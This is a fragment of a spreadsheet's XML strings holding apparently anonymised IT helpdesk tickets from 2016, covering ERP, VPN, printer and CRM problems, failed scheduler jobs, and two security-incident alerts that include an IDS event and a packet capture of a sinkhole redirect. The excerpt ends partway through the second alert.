    <t>ft584095 octophon sl3 prof. ladeschale mnr 51346687; s30852-s1982-r141-5; telefonnummer: 09279-80419; bÃ¼ro prozessflussverantwortliche scdp</t>
  </si>
  <si>
    <t xml:space="preserve">wrong printing on awa voucher inwarehouse_tools </t>
  </si>
  <si>
    <t xml:space="preserve">hello, when awa 81408476 - order with voucher - the printing says the discount is 130% - which is wrong.  please check and correct this. example in attachment. </t>
  </si>
  <si>
    <t>frtwncbv yvxrspqo</t>
  </si>
  <si>
    <t>erp frequent disconnections</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: rgtarthi.erjgypa@company.com_x000D_
_x000D_
hello help,_x000D_
_x000D_
there is frequent disconnections in erp &amp; is very slow also._x000D_
please have it checked at the earliest. </t>
  </si>
  <si>
    <t xml:space="preserve">unable to login to windows 
error :- domain controller logon balancing error
contact no:-
mobile:-
location :-germany (germany)
</t>
  </si>
  <si>
    <t>zfhqxjms ztfcobhy</t>
  </si>
  <si>
    <t xml:space="preserve">job pp_EU_tool_netch_ap1 failed in job_scheduler at: 09/20/2016 04:09:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job pp_EU_tool_netch_ap1 failed in job_scheduler at: 09/20/2016 04:09:00</t>
  </si>
  <si>
    <t>wakqbrfx olynbudg</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_2406b failed in job_scheduler at: 09/20/2016 04:00:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_2406b failed in job_scheduler at: 09/20/2016 04:00:00</t>
  </si>
  <si>
    <t>passwort ist abgelaufen. bitte reset einleiten. auch fÃ¼r das iphone.</t>
  </si>
  <si>
    <t>passwort ist abgelaufen. bitte reset einleiten. auch fÃ¼r das iphone. /jxphgfmb gjbtuwek</t>
  </si>
  <si>
    <t>erp SID_1 access</t>
  </si>
  <si>
    <t xml:space="preserve">while starting erp SID_1 i get an error logon balancing error 88
see attachment
this is for user vadnhyt and stegyhui and manjhyt
</t>
  </si>
  <si>
    <t xml:space="preserve">india kirty, packet drops on telecom_vendor_1 link since at 12:48 am et on 9/20. telecom_vendor_1#24090835 </t>
  </si>
  <si>
    <t>india kirty, packet drops on telecom_vendor_1 link since at 12:48 am et on 9/20.</t>
  </si>
  <si>
    <t>erp business_client ä¸èƒ½ä½¿ç”¨ï¼Œæ›´æ–°msdotnet_461_business_client_50_SID_792ã€‚</t>
  </si>
  <si>
    <t>æ›´æ–°msdotnet_461_business_client_50_SID_792 .</t>
  </si>
  <si>
    <t>okebwncv zyxvwkpn</t>
  </si>
  <si>
    <t>please check order# 35042103 - voucher v-00011418</t>
  </si>
  <si>
    <t>the order header is showing this voucher code, and the line item details are also showing this voucher code under "additional data b". nevertheless, table vbap-zzcmpgn_id is empty._x000D_
the printed acknowledgement and inwarehouse_tool are not referring this voucher code, but pricing has considered the voucher discount._x000D_
something is not correct...._x000D_
_x000D_
if voucher is not relevant for this customer/ship-to, then it should not consider voucher discount.</t>
  </si>
  <si>
    <t>HostName_894 : volume: c:\ label:sys-HostName_894 28385a7b is over 85% space consumed. space available: 4.6 g</t>
  </si>
  <si>
    <t>request</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: yxliakph.soucfnqe@gmail.com
sir,
the salary slip user id is locked for our  apprentice  jahtyuj-with id no:  20286786.
pl. help to retrieve the same
best  </t>
  </si>
  <si>
    <t>i can't reiceve e-mail form my mobile phone.</t>
  </si>
  <si>
    <t xml:space="preserve">could you reset my company mobile phone. details are below._x000D_
_x000D_
cihaz modeli: iphone7c2_x000D_
cihaz tÃ¼rÃ¼: iphone_x000D_
cihaz kimliÄŸi: 8hnorau8ap7era614bd7lb3t7c_x000D_
cihaz iÅŸletim sistemi: ios 10.0.sartlgeo lhqksbdx4a403_x000D_
cihaz kullanÄ±cÄ± aracÄ±sÄ±: apple-iphone7c2/1401.403_x000D_
cihaz imei: 352090078991606_x000D_
exchange activesync sÃ¼rÃ¼mÃ¼: 16.1_x000D_
cihaz eriÅŸim durumu: quarantined_x000D_
cihaz eriÅŸim durumu nedeni: global_x000D_
</t>
  </si>
  <si>
    <t>wmrozfpt ltgcofqp</t>
  </si>
  <si>
    <t>cant create a delivery note for a stock transfer</t>
  </si>
  <si>
    <t xml:space="preserve">SID_34_x000D_
create a delivery note for mm6339959 (5018954001) sto to apac_x000D_
see error message on att._x000D_
</t>
  </si>
  <si>
    <t>qpiojxcl dxkcljew</t>
  </si>
  <si>
    <t>add printer ag25  10.165.44.227</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: sbgvrncj.idfhtoqv@gmail.com_x000D_
_x000D_
hello,_x000D_
i am trying to add this printer but i receive the following message._x000D_
please enable it so that i can connect to this printer which is in the erp room here in germany, where i am attending a workshop for 2 weeks until 1 october._x000D_
_x000D_
_x000D_
[cid:image001.png@01SID_3531d.293ae2b0]_x000D_
_x000D_
many </t>
  </si>
  <si>
    <t>telephony_software  -  description</t>
  </si>
  <si>
    <t>telephony_software  -  department description_x000D_
_x000D_
for the germany users the description of the department was updated to ifbg._x000D_
as we would have expected cfc (customer fulfillment center) instead please let me know what it stands for and for what reason it has been changed.</t>
  </si>
  <si>
    <t>please fix the issues mentioned under description in SID_34. swathi and you coordinate and work on it please..</t>
  </si>
  <si>
    <t>1) sm21 - transaction canceled fp 045 ( vbkpf 5432 2016 3611112300 )_x000D_
_x000D_
2) sm21 - nieconn_refused(-10),remote communication failure with partner _x000D_
_x000D_
3) SID_183 - update terminated - system error: j_1b_nfe_update_xblnr .error during update table bkpf</t>
  </si>
  <si>
    <t xml:space="preserve">erp ticket </t>
  </si>
  <si>
    <t>erp ticket</t>
  </si>
  <si>
    <t>wireless access companyguest request</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: sbgvrncj.idfhtoqv@gmail.com
hello,
please usa kahrthyeuiuiw koithc from hr_tool wireless access for germany germany from 20-23 september and confirm when done.
kathatryuna.koithc@hr_tool.com&lt;mailto:kathatryuna.koithc@hr_tool.com&gt;   sctqwgmj yambwtfk
many </t>
  </si>
  <si>
    <t>vsbhyrt  is unable to open eng engineering tool nor able to log in to password_management_tool to reset passwords -</t>
  </si>
  <si>
    <t xml:space="preserve">vsbhyrt  is unable to open eng engineering tool nor able to log in to password_management_tool to reset passwords -_x000D_
pls help._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>rmdtqfxa fwpnqdxo</t>
  </si>
  <si>
    <t>unable to browse company collaboration_platform site</t>
  </si>
  <si>
    <t>tfaweyjd mdzrgxij</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_1148 failed in job_scheduler at: 09/20/2016 01:15:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_1148 failed in job_scheduler at: 09/20/2016 01:15:00</t>
  </si>
  <si>
    <t>reset password for erp SID_34 production - user id = laijuttr</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: wyxqkzmf.urigtqnp@gmail.com_x000D_
_x000D_
hi help desk_x000D_
_x000D_
kindly help to reset my password for SID_34 production as i am not able to login after changed password this morning.  </t>
  </si>
  <si>
    <t>he is not able to click on the icons.</t>
  </si>
  <si>
    <t>he is not able to click on the icons. he is able to login to citrix. please refer to the screenshot.</t>
  </si>
  <si>
    <t>re: ticket_no1551447 -- comments added</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: peuckbvr.tjihmgsv@gmail.com
hello bohyub &amp; pradtheyp,
yesterday jaya conveyed all that we discussed about changes required in graphics portal.
all requirements are fulfilled, you please go-ahead and change.
</t>
  </si>
  <si>
    <t>peuckbvr tjihmgsv</t>
  </si>
  <si>
    <t>beim benutzer klarp am pc evhw8114323 funktioniert das erp nicht richtig.</t>
  </si>
  <si>
    <t>er hat sich bereits am pc evhw8114113 geuacyltoe hxgayczeet und da funktioniert es einwandfrei.</t>
  </si>
  <si>
    <t xml:space="preserve">unable to login to erp SID_34 account </t>
  </si>
  <si>
    <t>mjsetabg oiurnzaq</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_1330 failed in job_scheduler at: 09/20/2016 00:13:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_1330 failed in job_scheduler at: 09/20/2016 00:13:00</t>
  </si>
  <si>
    <t>ecpkblrs buzgjypk</t>
  </si>
  <si>
    <t>xnmgsawf bwghcmxq</t>
  </si>
  <si>
    <t>crm portal login issue_ kxmidsga zokivdfa</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: kxmidsga.zokivdfa@gmail.com_x000D_
_x000D_
dear sir,_x000D_
_x000D_
i am not able to access the "crm" portal. please do the need full._x000D_
_x000D_
screen shot of error attached._x000D_
_x000D_
[cid:image001.jpg@01SID_35321.1ca7c050]_x000D_
_x000D_
with best </t>
  </si>
  <si>
    <t xml:space="preserve">job Job_1141 failed in job_scheduler at: 09/19/2016 23:45:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_1141 failed in job_scheduler at: 09/19/2016 23:45:00</t>
  </si>
  <si>
    <t xml:space="preserve">computer running slow </t>
  </si>
  <si>
    <t>uaevikhj uazfcwgm</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: hmjdrvpb.komuaywn@gmail.com_x000D_
_x000D_
hi it,_x000D_
_x000D_
i regularly have trouble with erp lagging, particularly it seems after 12pm our time._x000D_
last week, especially friday it was very bad all day._x000D_
yesterday and today, again it seems to lag after that 12 noon time._x000D_
this is becoming continuously embarrassing during phone calls when i am required to search for stock or quote/order over the phone as i have to apologise for the system taking so long._x000D_
_x000D_
there are two other csr's in the building, uisewznr ewtmkphs rarely has the same trouble (his system seems faster though), much faster than mine or duoyrpvi wgjpviul, amy's system will lag but not as much as mine._x000D_
_x000D_
can you please shed some light on this scenario?_x000D_
_x000D_
note:  it is more convenient for this office if i can be contacted mid/late mornings._x000D_
_x000D_
kind </t>
  </si>
  <si>
    <t>shipping dashbankrd - data/information not displayed when i select "previous week".</t>
  </si>
  <si>
    <t>shipping dashbankrd - tabs which have data refresh issue: (maybe data is not being refreshed daily or something has broken with respect to daily extraction"_x000D_
freight cost- region analysis_x000D_
packages dashbankrd_x000D_
%total freight cost by sales org and shipping location_x000D_
export indicator analysis_x000D_
delivery type analysis_x000D_
carrier wise analysis_x000D_
shipping statistics_x000D_
_x000D_
data is not being refreshed daily as i can't find reports when i select "previous week".</t>
  </si>
  <si>
    <t>upfthmjx fdxrpqat</t>
  </si>
  <si>
    <t>vpn not working- vpn.company.com  link is giving error</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_2555 failed in job_scheduler at: 09/19/2016 22:00:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_2555 failed in job_scheduler at: 09/19/2016 22:00:00</t>
  </si>
  <si>
    <t>problems with ap vpn</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: elixsfvu.pxwbjofl@gmail.com_x000D_
_x000D_
hi,_x000D_
_x000D_
i have problems using ap vpn from home._x000D_
_x000D_
[cid:image001.png@01SID_35323.a62bff10]_x000D_
_x000D_
best </t>
  </si>
  <si>
    <t>kis documents will not generate because the sto has no pricing.</t>
  </si>
  <si>
    <t>kis documents will not generate because the sto has no pricing._x000D_
dn 9169203442 sto 4908112195</t>
  </si>
  <si>
    <t xml:space="preserve">wrong unit price on inwarehouse_tool </t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: ovhtgsxd.dcqhnrmy@gmail.com_x000D_
_x000D_
it help,_x000D_
_x000D_
we have one shipment from apac to indonesia as attachment.  the unit price is 67.89 on the inwarehouse_tool from erp, but it should be 0.04/pcs._x000D_
_x000D_
can you check what caused the wrong price on inwarehouse_tool?_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>ç”µè„‘æ— æ³•è¿žæŽ¥å…¬å…±ç›˜ï¼Œè¯·å¸®æˆ‘è½¬ç»™å°è´º</t>
  </si>
  <si>
    <t>usa pc companyst-apc-01 in the pvd area cannot connect to \\srvlavstorage01\groups but can connect to the internet</t>
  </si>
  <si>
    <t>usa pc companyst-apc-01 in the pvd area needs to be on the network in order to print to the printers in pvd.</t>
  </si>
  <si>
    <t>-user unable  tologin to vpn._x000D_
-connected to the user system using teamviewer._x000D_
-help the user login to the company vpn using the vpn company vpn link._x000D_
-issue resolved.</t>
  </si>
  <si>
    <t>awpcmsey ctdiuqwe</t>
  </si>
  <si>
    <t>i am not able to log into my vpn. when i am trying to open a new session it is going to the "your session is finished" p</t>
  </si>
  <si>
    <t>name:mehrugshy
language:
browser:microsoft internet explorer
email:dcvphjru.ybomrjst@gmail.com
customer number:
telephone:
summary:i am not able to log into my vpn. when i am trying to open a new session it is going to the "your session is finished" page</t>
  </si>
  <si>
    <t>vpn connectivity</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: gmrxwqlf.vzacdmbj@gmail.com_x000D_
_x000D_
i can't reconnect to the vpn.  i hit click here and screen does not change.  i tried closing and relaunching and have some result.  i tried restarting my computer and have same result._x000D_
_x000D_
[cid:image001.png@01SID_35295.4882bb80]_x000D_
_x000D_
best </t>
  </si>
  <si>
    <t>gmrxwqlf vzacdmbj</t>
  </si>
  <si>
    <t xml:space="preserve">referencing ticket ticket_no1499477. customer is stating the barcodes are not scannable on the label. </t>
  </si>
  <si>
    <t>please revisit ticket ticket_no1499477 and review the fastenal label as the customer is claiming the barcode that we output from from the zebra(z1) printers do not scan. will need to replicate the barcode located on the labels that we currently output from the datamax (m1)._x000D_
_x000D_
see attached.</t>
  </si>
  <si>
    <t>objrkcwe zamgitwx</t>
  </si>
  <si>
    <t>hxripljo efzounig</t>
  </si>
  <si>
    <t>unable to access na vpn</t>
  </si>
  <si>
    <t>when i click on "click here" to enter a new session the screen just repeats itself instead of prompting for user id and password as it usually does.  i am able to use euro vpn through a link provided to me by email.</t>
  </si>
  <si>
    <t xml:space="preserve">vpn </t>
  </si>
  <si>
    <t xml:space="preserve">
received from: oetlgbfw.bsctrnwp@gmail.com
are we having vpn issues i can't get logged in to vpn
dthyan matheywtyuews
sales manager gl2
oetlgbfw.bsctrnwp@gmail.com&lt;mailto:oetlgbfw.bsctrnwp@gmail.com&gt;
</t>
  </si>
  <si>
    <t>sntvfpbl vtokgley</t>
  </si>
  <si>
    <t xml:space="preserve"> germany steel plant the programdnty EU_tool does not run. +499433255366</t>
  </si>
  <si>
    <t xml:space="preserve">name:cfokqnhz notxygdz
language:
browser:microsoft internet explorer
email:cfokqnhz.notxygdz@gmail.com
customer number:
telephone:0
summary:hello,
in germany steel plant the programdnty EU_tool does not run.
please check the programdnty!
</t>
  </si>
  <si>
    <t>cfokqnhz notxygdz</t>
  </si>
  <si>
    <t>elphfvdt ileozacs</t>
  </si>
  <si>
    <t>vpn login issue.</t>
  </si>
  <si>
    <t>vpn login issue._x000D_
-user unable  tologin to vpn._x000D_
-connected to the user system using teamviewer._x000D_
-help the user login to the company vpn using the vpn company vpn link._x000D_
-issue resolved.</t>
  </si>
  <si>
    <t>suyighpt wifujdvq</t>
  </si>
  <si>
    <t>user unable  tologin to vpn.</t>
  </si>
  <si>
    <t>name:lizhwdoe mjudivse
language:
browser:microsoft internet explorer
email:lizhwdoe.mjudivse@gmail.com
customer number:
telephone:
summary:can't login in to vpn</t>
  </si>
  <si>
    <t>lizhwdoe mjudivse</t>
  </si>
  <si>
    <t>name:wvqgbdhm fwchqjor
language:
browser:microsoft internet explorer
email:wvqgbdhm.fwchqjor@gmail.com
customer number:
telephone:-not available
summary:can't get into vpn - need to be on at 4:30 est and it wont' happen please help aerp!</t>
  </si>
  <si>
    <t>my distributor_tool account is not working ! my dashbankrd is gone/ i cannot select sales org/ cannot select customers</t>
  </si>
  <si>
    <t xml:space="preserve">access to tjlizqgc ngvwoukp' calendars </t>
  </si>
  <si>
    <t>name:xmeytziq dcgwuvfk
language:
browser:microsoft internet explorer
email:xmeytziq.dcgwuvfk@gmail.com
customer number:
telephone:
summary:i need to get access to tjlizqgc ngvwoukp calendar i have taken over the ehs duties here in usa as well as usa indiana.</t>
  </si>
  <si>
    <t>unable to see name in engineering_tool</t>
  </si>
  <si>
    <t>ticket update on inplant_861712</t>
  </si>
  <si>
    <t>name:itclukpe aimcfeko
language:
browser:microsoft internet explorer
email:itclukpe.aimcfeko@gmail.com
customer number:
telephone:
summary:need user name and password reset for mii for wpcatozg roceshun em#21111123
his current id and password will let him log in the system but not in mii</t>
  </si>
  <si>
    <t>wpcatozg roceshun</t>
  </si>
  <si>
    <t>crm add-in for outlook</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: pnhlrfao.ivjxlyfz@gmail.com_x000D_
_x000D_
global it team,_x000D_
_x000D_
i do not currently have connectivity between crm and microsoft outlook on my company computer. we are now required to begin to link emails and contact information between outlook and crm and without the crm add-in working on my device, i am currently unable to do this . please open a ticket to get this completed. </t>
  </si>
  <si>
    <t>password reset for zqbgmfle.wrkmieao@gmail.com</t>
  </si>
  <si>
    <t>nivqoxyt ivrhjmnx</t>
  </si>
  <si>
    <t>ticket update on inplant_861691</t>
  </si>
  <si>
    <t>distributor_tool and engineering_tool do not show inventory for mm 5387556</t>
  </si>
  <si>
    <t xml:space="preserve">distributor_tool and engineering_tool do not show inventory for mm 6498667, even though mmbe transaction shows unrestricted stock in plant_101 and dvw1._x000D_
other mm numbers such as 6498662 or 4870484 do not have this issue._x000D_
not sure if there are other mm numbers where we do have stock but distributor_tool and engineering_tool aren't seeing such stock._x000D_
_x000D_
please see attached email for background and attached screenshots from materials_managementbe transaction, engineering_tool and distributor_tool._x000D_
</t>
  </si>
  <si>
    <t>hwfrvpbc thofnixk</t>
  </si>
  <si>
    <t>unable to connect to ca07 printer</t>
  </si>
  <si>
    <t>skxfydnr cdgrsqnw</t>
  </si>
  <si>
    <t>system (SID_34, SID_37, SID_39, SID_38, hrp, other ?): SID_1_x000D_
_x000D_
enter user id of user having the issue:  bakertm_x000D_
_x000D_
transaction code(s) the user needs or was working with:  _x000D_
_x000D_
describe the issue:  userid no longer active for SID_1.   reset passwords with password_management_tool - all changed but SID_1 as userid no longer active.  please allow access as needed for erp mii uacyltoe hxgayczeing._x000D_
_x000D_
if you are getting a "not authorized" message, recreate the condition then do   /nsu53   and attach result to the ticketing_tool ticket._x000D_
_x000D_
provide access the same as this other user:</t>
  </si>
  <si>
    <t>udhsyljz cogbript</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: svlcqmnb.qlwerhxt@gmail.com_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>svlcqmnb qlwerhxt</t>
  </si>
  <si>
    <t>csqe - automatic knowledge base sync</t>
  </si>
  <si>
    <t>we want to setup erp to automatically sync and push updated knowledge bases to the ipc/configair server space._x000D_
this is a standard practice, to not require network admin to do that manually, which also is to eliminate various compatibility issues from doing that manually with extracted files._x000D_
for setup in each system in turn, SID_21, SID_1, and SID_34 for change/delta moves to configair servers from erp updates.</t>
  </si>
  <si>
    <t>iqtynrbf fyvjpbui</t>
  </si>
  <si>
    <t>cannot print anymore on tc78</t>
  </si>
  <si>
    <t>printer is asking for trusted source and driver install but does still not work after update...</t>
  </si>
  <si>
    <t>dtnhwjve tqdhvazx</t>
  </si>
  <si>
    <t>locked out on the crm account</t>
  </si>
  <si>
    <t>access to drawings in net weaver</t>
  </si>
  <si>
    <t>name:jashyht mkuhtyhui
language:
browser:microsoft internet explorer
email:jhxwiply.midhcnze@gmail.com
customer number:
telephone:
summary:i have erp netweaver business client but i am unable to pull up drawings. i have seen coworker screens and they look similar but the drawing tab is missing on mine</t>
  </si>
  <si>
    <t xml:space="preserve">crm - outlook </t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: uvorgwts.mlqzaicb@gmail.com_x000D_
_x000D_
hello i.t. team,_x000D_
_x000D_
i need to get my outlook and crm remfg_toolted. please reach out to me as soon as possible._x000D_
_x000D_
best </t>
  </si>
  <si>
    <t>crm/outlook</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: zolnubvq.ehrqifxp@gmail.com
i no longer have the crm portion or add on in my outlook.  i need to have this installed.
login webdhyt
employee number 60676837
best </t>
  </si>
  <si>
    <t>crm add-in / outlook</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: mdbegvct.dbvichlg@gmail.com_x000D_
_x000D_
hi it â€“ i'm not seeing the crm options in my outlook.  please let me know how i can get that working as i have to be in dallas next monday for training.  </t>
  </si>
  <si>
    <t xml:space="preserve">crm addin in outook </t>
  </si>
  <si>
    <t>i need to have crm addin in outlook to perform my daily job functions moving forward</t>
  </si>
  <si>
    <t>ufxdkqbc uehvxmfy</t>
  </si>
  <si>
    <t>ticket update on inplant_861658</t>
  </si>
  <si>
    <t>sent items folder not showing up in outlook.</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_3045_ap failed in job_scheduler at: 09/19/2016 11:39:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_3045_ap failed in job_scheduler at: 09/19/2016 11:39:00</t>
  </si>
  <si>
    <t>unable to fill the expense report form for employee</t>
  </si>
  <si>
    <t>quotation printing incorrect voucher discount</t>
  </si>
  <si>
    <t xml:space="preserve">see attached example - 3116245007.  discount applied was 57.5%, but quote copy is showing 115%.  not sure where the pdf is picking up the additional 57.5%._x000D_
_x000D_
also see example 3116220390.  this will show the print on 8/29 was correct, and what was printed today is not.  did something move over the weekend that can be backed out??_x000D_
</t>
  </si>
  <si>
    <t>ticket_no1543461 - ticket update</t>
  </si>
  <si>
    <t xml:space="preserve">sfb issue </t>
  </si>
  <si>
    <t xml:space="preserve">
summary:unable to log into skype calls</t>
  </si>
  <si>
    <t>tjyoheic eyuwsgld</t>
  </si>
  <si>
    <t>ticket_no1546770 - ticket update</t>
  </si>
  <si>
    <t xml:space="preserve">update on ticket_no1542996 </t>
  </si>
  <si>
    <t>reset password for hana systems SID_60,SID_59 for user id : bollmam</t>
  </si>
  <si>
    <t>reset password for hana systems SID_60,SID_59 for user id : bollmam._x000D_
kindly make it on priority basis.</t>
  </si>
  <si>
    <t>please delete sm35 job</t>
  </si>
  <si>
    <t>same issue as inc1512788_x000D_
_x000D_
please delete rm_eb1160912</t>
  </si>
  <si>
    <t>sandplant_162  -    fc9/15 Â· drlab HostName_1175 is down since 09:53 pm et on 09/19</t>
  </si>
  <si>
    <t>sandplant_162  -    fc9/15 Â· drlab HostName_1175  is down since 09:53 pm et on 09/19</t>
  </si>
  <si>
    <t>terhyury jerhtyua, employee of usa, is locked out of mii - please unlock and verify if employee has more than SID_34 access</t>
  </si>
  <si>
    <t xml:space="preserve">terhyury jerhtyua, employee of usa, is locked out of mii - please unlock and verify if employee has more than SID_34 access_x000D_
employee is unable to report production and capture value add data on mii </t>
  </si>
  <si>
    <t>epivntxc fdrxmuga</t>
  </si>
  <si>
    <t>schdule name:"final" in job_scheduler :batch job documentation needs to be updated</t>
  </si>
  <si>
    <t>can't access skype for business 2015_x000D_
comes up with message "c:/programdnty files/microsoft office 15/root/office 15/lync.exe</t>
  </si>
  <si>
    <t>iwtvrhnz rxiumhfk</t>
  </si>
  <si>
    <t>security incidents - ( #in33805815) : possible malware infection - traffic from sinkhole domain to apul7700790</t>
  </si>
  <si>
    <t>=========================_x000D_
event data_x000D_
=========================_x000D_
related events: _x000D_
event id: 94661793_x000D_
event summary: 52151 vid36000 server response with anubis sinkhole cookie set - probable infected asset_x000D_
occurrence count: 2_x000D_
event count: 1_x000D_
_x000D_
host and connection information_x000D_
source ip: 195.22.28.222_x000D_
source port: 80_x000D_
source ip geolocation: lisbon, prt_x000D_
destination ip: 71.58.38.9639_x000D_
destination hostname: apul8811801 _x000D_
destination port: 51547_x000D_
connection directionality: incoming_x000D_
protocol: tcp_x000D_
http status code: 302_x000D_
_x000D_
device information_x000D_
device ip: 80.68.49.4169_x000D_
device name: isensor05.company.com_x000D_
log time: 2016-09-19 at 02:13:00 utc_x000D_
action: not blocked_x000D_
vendor eventid: 2422739_x000D_
cvss score: -1 _x000D_
vendor priority: 2_x000D_
vendor version: 7_x000D_
_x000D_
scwx event processing information_x000D_
sherlock rule id (sle): 699417_x000D_
inspector event id: 880503574_x000D_
ontology id: 200020003203755736_x000D_
event type id: 200020003203582148_x000D_
agent id: 102835_x000D_
_x000D_
event detail:_x000D_
[**] [1:21163262:2] 52151 vid36000 server response with anubis sinkhole cookie set - probable infected asset [**]_x000D_
[classification: none] [priority: 2] [action: accept] [impact_flag: 0] [impact: 0] [blocked: 0] [vlan: 0] [mpls label: 0] [pad2: 1]_x000D_
[sensor id: 606873][event id: 2422739][time: 2585362291.144214]_x000D_
[src ip: 195.22.28.222][dst ip: 71.58.38.9639][sport/itype: 80][dport/icode: 51547][proto: 6]_x000D_
09/19/2016-02:13:00.144214 195.22.28.222:80 -&gt; 71.58.38.9639:51547_x000D_
tcp ttl:49 tos:0x0 id:15452 iplen:20 dgmlen:391 df_x000D_
***ap*** seq: 0x7da4b41b ack: 0x836645ee win: 0x68b0 tcplen: 20_x000D_
==pcap 1==_x000D_
_x000D_
_x000D_
[ex http_uri 9: /domain/newflv.sohu.ccgslb.net]_x000D_
_x000D_
[ex http_hostname 10: sso.anbtr.com]_x000D_
_x000D_
[o:security]_x000D_
_x000D_
ascii packet(s):_x000D_
==pcap 1 ascii s==_x000D_
.....i.wv3..........e...&lt;\@.1........,.e.p.[}....fe.p.h.....http/1.1.302.moved.temporarily..server:.nginx..date:.mon,.19.sep.2016.02:13:00.gmt..content-type:.text/html..connection:.close..set-cookie:.anbtr=3b22f0eec4487da1ac8019caac1283a4;.domain=.ccgslb.net..location:._x000D_
==pcap 1 ascii e==_x000D_
_x000D_
hex packet(s):_x000D_
==pcap 1 hex s==_x000D_
000000 0c00 0000 ac49 df57 5633 0200 8701 0000 .....i.wv3......_x000D_
000010 8701 0000 4500 0187 3c5c 4000 3106 0bb0 ....e...&lt;\@.1..._x000D_
000020 c316 1cde 0a2c 1645 0050 c95b 7da4 b41b .....,.e.p.[}..._x000D_
000030 8366 45ee 5018 68b0 bfb0 0000 4854 5450 .fe.p.h.....http_x000D_
000040 2f31 2e31 2033 3032 204d 6f76 6564 2054 /1.1.302.moved.t_x000D_
000050 656d 706f 7261 7269 6c79 0d0a 5365 7276 emporarily..serv_x000D_
000060 6572 3a20 6e67 696e 780d 0a44 6174 653a er:.nginx..date:_x000D_
000070 204d 6f6e 2c20 3139 2053 6570 2032 3031 .mon,.19.sep.201_x000D_
000080 3620 3032 3a31 333a 3030 2047 4d54 0d0a 6.02:13:00.gmt.._x000D_
000090 436f 6e74 656e 742d 5479 7065 3a20 7465 content-type:.te_x000D_
0000a0 7874 2f68 746d 6c0d 0a43 6f6e 6e65 6374 xt/html..connect_x000D_
0000b0 696f 6e3a 2063 6c6f 7365 0d0a 5365 742d ion:.close..set-_x000D_
0000c0 436f 6f6b 6965 3a20 616e 6274 723d 3362 cookie:.anbtr=3b_x000D_
0000d0 3232 6630 6565 6334 3438 3764 6131 6163 22f0eec4487da1ac_x000D_
0000e0 3830 3139 6361 6163 3132 3833 6134 3b20 8019caac1283a4;._x000D_
0000f0 646f 6SID_26 696e 3d2e 6363 6773 6c62 2e6e domain=.ccgslb.n_x000D_
000100 6574 0d0a 4c6f 6361 7469 6f6e 3a20 6874 et..location:.ht_x000D_
000110 7470 3a2f 2f78 7373 6f2e 6e65 7766 6c76 tp://xsso.newflv_x000D_
000120 2e73 6f68 752e 6363 6773 6c62 2e6e 6574 .sohu.ccgslb.net_x000D_
000130 2f33 6232 3266 3065 6563 3434 3837 6461 /3b22f0eec4487da_x000D_
000140 3161 6338 3031 3963 6161 6331 3238 336sartlgeo lhqksbdxac8019caac1283a_x000D_
000150 340d 0a0d 0a47 6f20 6874 7470 3a2f 2f78 4....go._x000D_
000160 7373 6f2e 6e65 7766 6c76 2e73 6f68 752e sso.newflv.sohu._x000D_
000170 6363 6773 6c62 2e6e 6574 2f33 6232 3266 ccgslb.net/3b22f_x000D_
000180 3065 6563 3434 3837 6461 3161 6338 3031 0eec4487da1ac801_x000D_
000190 3963 6161 6331 3238 3361 34 9caac1283a4_x000D_
==pcap 1 hex e==</t>
  </si>
  <si>
    <t>access point company_ita_company_milano_ap05 is down</t>
  </si>
  <si>
    <t>ip 83.43.63.0179_x000D_
blue light blinking_x000D_
does not permit connection_x000D_
_x000D_
could you please check ?</t>
  </si>
  <si>
    <t>t&amp;d inwarehouse_tool 0512678028 - pricing error</t>
  </si>
  <si>
    <t xml:space="preserve">hi,_x000D_
_x000D_
please refer below mail from branch  &amp; attached t&amp;d inwarehouse_tool of plant_61.  the inwarehouse_tool has picked the total basic value as rs.2,40,991.50 &amp; the excise duty has got charged &amp; paid accordingly, instead of correct total basic value of rs.1,40,000.00, (70,000 x 2) as per previous inwarehouse_tool#0512508978/07.04.16.  kindly find &amp; fix the problem for future inwarehouse_tool to capture the correct total basic value to avoid paying higher excise duty. _x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>security incidents - ( #in33809307 ) : possible malware infection - traffic from sinkhole domain to android-13849fa3</t>
  </si>
  <si>
    <t>source ip :195.22.28.222 
system name :android-13849fa3e9c2e1e3
user  name:unknown
location :unknown
sep , sms status :
field sales user ( yes / no) :  
dsw event log:
==================================================================================================
=========================
incident overview
=========================
